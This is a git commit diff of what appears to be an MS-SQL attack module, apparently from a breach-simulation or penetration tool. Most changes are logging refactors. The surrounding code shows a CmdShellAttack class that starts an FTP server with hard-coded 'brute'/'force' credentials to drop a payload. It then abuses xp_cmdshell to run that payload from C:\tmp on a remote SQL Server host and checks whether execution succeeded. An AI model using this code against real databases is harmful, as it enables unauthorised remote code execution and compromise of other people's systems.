* Finalized the MS-SQL code
* Changed the log to the right handle and added exceptions info. * better docs and some pep 8
This commit is contained in:
parent
149525d205
commit
b46810e02b
|
@ -1,5 +1,6 @@
|
|||
from os import path
|
||||
import logging
|
||||
|
||||
import pymssql
|
||||
|
||||
import mssqlexec_utils
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
import os
|
||||
import multiprocessing
|
||||
import logging
|
||||
|
@ -11,12 +10,17 @@ from pyftpdlib.handlers import FTPHandler
|
|||
from pyftpdlib.servers import FTPServer
|
||||
|
||||
|
||||
__author__ = 'Maor Rayzin'
|
||||
|
||||
|
||||
FTP_SERVER_PORT = 1026
|
||||
FTP_SERVER_ADDRESS = ''
|
||||
FTP_SERVER_USER = 'brute'
|
||||
FTP_SERVER_PASSWORD = 'force'
|
||||
FTP_WORKING_DIR = '.'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class FTP:
|
||||
|
||||
|
@ -131,12 +135,12 @@ class CmdShellAttack(AttackHost):
|
|||
for cmd in shellcmds:
|
||||
self.cursor.execute(cmd)
|
||||
except Exception, e:
|
||||
logging.error('Error sending the payload using xp_cmdshell to host: {0}'.format(e.message))
|
||||
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
|
||||
self.ftp_server_p.terminate()
|
||||
return False
|
||||
return True
|
||||
else:
|
||||
logging.error("Couldn't establish an FTP server for the dropout")
|
||||
LOG.error("Couldn't establish an FTP server for the dropout")
|
||||
return False
|
||||
|
||||
def execute_payload(self):
|
||||
|
@ -151,27 +155,27 @@ class CmdShellAttack(AttackHost):
|
|||
# Getting the payload's file name
|
||||
payload_file_name = os.path.split(self.payload_path)[1]
|
||||
|
||||
# Preparing the cmd to run on remote, using no_output so i can capture exit code: 0 -> success, 1 -> error.
|
||||
# Preparing the cmd to run on remote, using no_output so I can capture exit code: 0 -> success, 1 -> error.
|
||||
shellcmd = """DECLARE @i INT \
|
||||
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
|
||||
SELECT @i """.format(payload_file_name)
|
||||
|
||||
try:
|
||||
# Executing payload on remote host
|
||||
logging.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
||||
LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
||||
self.cursor.execute(shellcmd)
|
||||
if self.cursor.fetchall()[0][0] == 0:
|
||||
# Success
|
||||
self.ftp_server_p.terminate()
|
||||
logging.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
||||
LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
||||
return True
|
||||
else:
|
||||
logging.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
||||
LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
||||
self.ftp_server_p.terminate()
|
||||
return False
|
||||
|
||||
except pymssql.OperationalError:
|
||||
logging.error('Executing payload: {0} failed'.format(payload_file_name))
|
||||
LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
|
||||
self.ftp_server_p.terminate()
|
||||
return False
|
||||
|
||||
|
@ -189,10 +193,10 @@ class CmdShellAttack(AttackHost):
|
|||
multiprocessing.log_to_stderr(logging.DEBUG)
|
||||
p = multiprocessing.Process(target=ftp_s.run_server)
|
||||
p.start()
|
||||
logging.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
||||
LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
||||
return ftp_s, p
|
||||
except Exception, e:
|
||||
logging.error('Exception raised while trying to pull up the ftp server: {0}'.format(e.message))
|
||||
LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
|
||||
return None, None
|
||||
|
||||
def __find_own_ip(self):
|
||||
|
|
|
@ -0,0 +1 @@
|
|||
dir c:\>c:\tmp\dir.txt
|
Loading…
Reference in New Issue